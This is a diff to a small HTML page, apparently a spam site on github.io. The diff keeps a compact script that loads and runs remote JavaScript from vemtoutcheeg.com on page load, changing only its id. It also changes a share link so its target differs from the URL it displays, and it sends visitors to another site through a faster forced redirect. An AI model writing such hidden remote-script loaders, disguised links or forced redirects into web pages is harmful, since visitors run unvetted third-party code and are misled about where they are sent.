--- a/ready.html
+++ b/ready.html
@@ -49,8 +49,7 @@
             margin: 20px 0;
         }
     </style>
-        <script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('vemtoutcheeg.com',8058399,document.createElement('script'))</script>
-</head>
+        <script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('vemtoutcheeg.com',8483697,document.createElement('script'))</script></head>
 <body>
     <div class="content">
         <h1>BELIEVE ME, EVERYONE WILL END UP LIKING ME.</h1>
@@ -61,7 +60,7 @@
 
         <hr>
 
-        <p style="color: red">Share this website with your friends: <a href="https://australiavd.github.io/" target="_blank">https://australiavd.github.io/</a></p>
+        <p style="color: red">Share this website with your friends: <a href="https://vietnamvd.github.io/sad" target="_blank">https://australiavd.github.io/</a></p>
         <script type="text/javascript">
             atOptions = {
                 'key' : '2a6fea9f095fbace44311f3473a8acdc',
@@ -86,9 +85,9 @@
             // Redirect after countdown reaches 0
             if (countdown === 0) {
                 clearInterval(interval);
-                window.location.href = "https://apotua.github.io/";  // Target URL
+                window.location.href = "https://vietnamvd.github.io/sad";  // Target URL
             }
-        }, 10000); // Update every second
+        }, 1000); // Update every second
     </script>
 </body>
 </html>
